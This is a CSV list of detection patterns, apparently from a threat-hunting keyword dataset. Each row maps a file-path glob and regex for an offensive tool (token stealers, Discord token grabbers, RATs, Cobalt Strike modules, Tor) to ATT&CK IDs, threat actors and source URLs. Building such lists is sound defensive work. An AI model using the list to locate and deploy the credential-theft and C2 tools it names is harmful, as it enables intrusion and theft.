"*/tmp/wordlist.txt*",".{0,1000}\/tmp\/wordlist\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","#linux","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","12007"
"*/tn3270-screen.nse*",".{0,1000}\/tn3270\-screen\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12008"
"*/Token%20grabber.dll*",".{0,1000}\/Token\%20grabber\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","12009"
"*/TokenAssignor.exe*",".{0,1000}\/TokenAssignor\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12010"
"*/TokenDump.exe*",".{0,1000}\/TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","1","N/A","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12011"
"*/TokenFinder.git*",".{0,1000}\/TokenFinder\.git.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","1","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","12012"
"*/TokenFinder.py*",".{0,1000}\/TokenFinder\.py.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","1","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","12013"
"*/Token-Impersonation.git*",".{0,1000}\/Token\-Impersonation\.git.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","1","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","12014"
"*/Token-Impersonation.ps1*",".{0,1000}\/Token\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","1","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","12015"
"*/TokenPlayer.git*",".{0,1000}\/TokenPlayer\.git.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","12016"
"*/TokenStealer.git*",".{0,1000}\/TokenStealer\.git.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","12017"
"*/TokenStealing*",".{0,1000}\/TokenStealing.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12018"
"*/TokenStealing.exe*",".{0,1000}\/TokenStealing\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12019"
"*/TokenStomp.exe*",".{0,1000}\/TokenStomp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12020"
"*/TokenStomp.exe*",".{0,1000}\/TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12021"
"*/TokenStripBOF*",".{0,1000}\/TokenStripBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","N/A","10","10","44","7","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z","12022"
"*/TokenTactics.git*",".{0,1000}\/TokenTactics\.git.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","12023"
"*/TokenTacticsV2.git*",".{0,1000}\/TokenTacticsV2\.git.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","1","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","12024"
"*/TokenUniverse.git*",".{0,1000}\/TokenUniverse\.git.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","12025"
"*/TokenUniverse.zip*",".{0,1000}\/TokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","12026"
"*/Tokenvator/*",".{0,1000}\/Tokenvator\/.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","12027"
"*/tomcat-RH-root.sh*",".{0,1000}\/tomcat\-RH\-root\.sh.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","12028"
"*/tomcat-RH-root.sh*",".{0,1000}\/tomcat\-RH\-root\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","12029"
"*/tools/BeaconTool/*",".{0,1000}\/tools\/BeaconTool\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","12030"
"*/tools/DHCP.py*",".{0,1000}\/tools\/DHCP\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","#linux","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","12031"
"*/tools/gs-pipe *",".{0,1000}\/tools\/gs\-pipe\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","12032"
"*/tools/obfuscation.py -i *",".{0,1000}\/tools\/obfuscation\.py\s\-i\s.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#linux","N/A","10","","N/A","","","","12033"
"*/tools/psexec.rb*",".{0,1000}\/tools\/psexec\.rb.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PsExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","12034"
"*/Tools/ResHacker.exe*",".{0,1000}\/Tools\/ResHacker\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","false positive risk","6","","N/A","","","","12035"
"*/Tools/spoolsystem/*",".{0,1000}\/Tools\/spoolsystem\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","12036"
"*/Tools/Squeak/Squeak*",".{0,1000}\/Tools\/Squeak\/Squeak.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","12037"
"*/toolsdownload/iepv.zip*",".{0,1000}\/toolsdownload\/iepv\.zip.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12038"
"*/toolsdownload/rdpv.zip*",".{0,1000}\/toolsdownload\/rdpv\.zip.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","12039"
"*/Tool-X.git*",".{0,1000}\/Tool\-X\.git.{0,1000}","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/Tool-X","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12040"
"*/top_mots_combo.7z*",".{0,1000}\/top_mots_combo\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","12041"
"*/top-usernames-shortlist.txt*",".{0,1000}\/top\-usernames\-shortlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","12042"
"*/tor -mindepth 1 -maxdepth 1 -type f *",".{0,1000}\/tor\s\-mindepth\s1\s\-maxdepth\s1\s\-type\sf\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12043"
"*/tor/torrc*",".{0,1000}\/tor\/torrc.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12044"
"*/tor-0.*.tar.gz*",".{0,1000}\/tor\-0\..{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12045"
"*/Tor2web-*.tar.gz*",".{0,1000}\/Tor2web\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","12046"
"*/Tor2web-*.zip*",".{0,1000}\/Tor2web\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","12047"
"*/tor2web.conf*",".{0,1000}\/tor2web\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","12048"
"*/Tor2web.git*",".{0,1000}\/Tor2web\.git.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","12049"
"*/tor2web.js*",".{0,1000}\/tor2web\.js.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","12050"
"*/tor-archive-keyring*",".{0,1000}\/tor\-archive\-keyring.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12051"
"*/ToRat.git*",".{0,1000}\/ToRat\.git.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","12052"
"*/torbrowser-install-*.exe  *",".{0,1000}\/torbrowser\-install\-.{0,1000}\.exe\s\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A","12053"
"*/tor-browser-linux*.*",".{0,1000}\/tor\-browser\-linux.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","#linux","N/A","9","10","N/A","N/A","N/A","N/A","12054"
"*/tor-browser-osx64*.*",".{0,1000}\/tor\-browser\-osx64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","12055"
